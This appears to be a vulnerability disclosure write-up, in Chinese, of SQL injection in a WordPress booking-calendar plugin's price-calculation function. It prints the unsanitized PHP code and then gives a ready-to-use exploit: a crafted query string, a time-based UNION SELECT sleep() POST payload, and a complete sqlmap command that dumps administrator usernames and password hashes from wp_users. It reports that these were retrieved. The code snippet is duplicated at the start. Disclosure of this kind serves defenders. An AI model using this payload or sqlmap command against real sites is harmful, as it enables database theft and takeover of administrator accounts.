<ul><li>/dex_bccf.php</li></ul><pre class="">function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... }...
<ul><li>/dex_bccf.php</li></ul><pre class="">function dex_bccf_caculate_price($startday, $enddate, $calendar, $default_price) { ... //$calendar is not sanitized in sql query $codes = $wpdb->get_results( 'SELECT * FROM '.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE `cal_id`='.$calendar); $mode = (dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) == 'false'); while ( (($enddate>$startday) && !$mode) || (($enddate>=$startday) && $mode) ) { $daily_price = $default_price; $sprice = array(); foreach ($codes as $value) { $sfrom = strtotime($value->date_from); $sto = strtotime($value->date_to); if ($startday >= $sfrom && $startday <= $sto) { $sprice = explode (';', $value->price); $daily_price = $sprice[0]; } } $season_prices[] = $sprice; $price += $daily_price; $startday = strtotime (date("Y-m-d", $startday)." +1 day"); //60*60*24; $days++; } ... } </pre><p>$calendar未经过过滤带入SQL语句导致注入。为了达成注入条件,需要令:</p><pre class="">$enddate>$startday</pre><p>并且</p><pre class="">$startday >= $sfrom && $startday <= $sto</pre><p>构造querystring:</p><pre class="">action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2</pre><p>POST内容:</p><pre class="">dex_item=1 union select 0x32323B2332,1,sleep(10),3,0x323031342D312D33</pre><p>执行的SQL语句为:</p><pre class="">SELECT * FROM wp_bccf_reservation_calendars WHERE id=1 union select 0x32323B2332,1,sleep(3),3,0x323031342D312D33</pre><p>证明漏洞存在。</p><p>使用sqlmap,获取管理员的帐号密码。使用命令:</p><pre class="">python sqlmap.py -u "http://10.211.55.3/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost&from=2014-1-1&to=2014-1-2" --data="dex_item=1" -p dex_item --dbms=mysql -D wordpress -T wp_users -C user_login,user_pass --dump<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;"> </span></pre><p><img alt="C41F761A-C60C-4806-9951-6B640FFF9961.png" src="https://images.seebug.org/@/uploads/1434437047822-C41F761A-C60C-4806-9951-6B640FFF9961.png" data-image-size="811,427"><br></p><p>得到管理员的帐号密码: </p><p><img alt="2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" src="https://images.seebug.org/@/uploads/1434437067124-2F36813B-D31C-48F8-B5FA-D62DFCC9DFE2.png" data-image-size="838,368"><br></p>
